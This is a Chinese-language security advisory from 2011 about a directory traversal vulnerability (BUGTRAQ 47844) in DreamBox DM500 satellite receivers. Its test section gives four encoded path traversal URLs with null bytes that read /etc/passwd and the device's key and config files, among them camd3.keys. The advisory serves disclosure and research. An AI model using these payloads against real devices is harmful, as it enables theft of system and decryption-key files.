发布日期：2011-05-13
更新日期：2011-06-28

受影响系统：

Dream Multimedia Dreambox Dream Multimedia Dreambox DM80
Dream Multimedia Dreambox Dream Multimedia Dreambox DM50
Dream Multimedia Dreambox Dream Multimedia Dreambox DM50
Dream Multimedia Dreambox Dream Multimedia Dreambox DM50
Dream Multimedia Dreambox Dream Multimedia Dreambox DM50

描述：

---

BUGTRAQ  ID: 47844

DreamBox是Linux驱动的DVB卫星、陆地和电缆数字电视接收器，有德国多媒体供应商Dream Multimedia出品。

DreamBox的多个DM500产品存在目录遍历漏洞，远程攻击者可利用这些漏洞查看Web服务器中的任意本地文件，获取敏感信息。

<*来源：LiquidWorm
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://www.example.com/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd%00
http://www.example.com/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../Autoupdate.key%00
http://www.example.com/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../camd3.config%00
http://www.example.com/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../var/keys/camd3.keys%00

建议：

---

厂商补丁：

Dream Multimedia
----------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.dream-multimedia-tv.de/english/products_dm500.php

浏览次数：2545
严重程度：0（网友投票）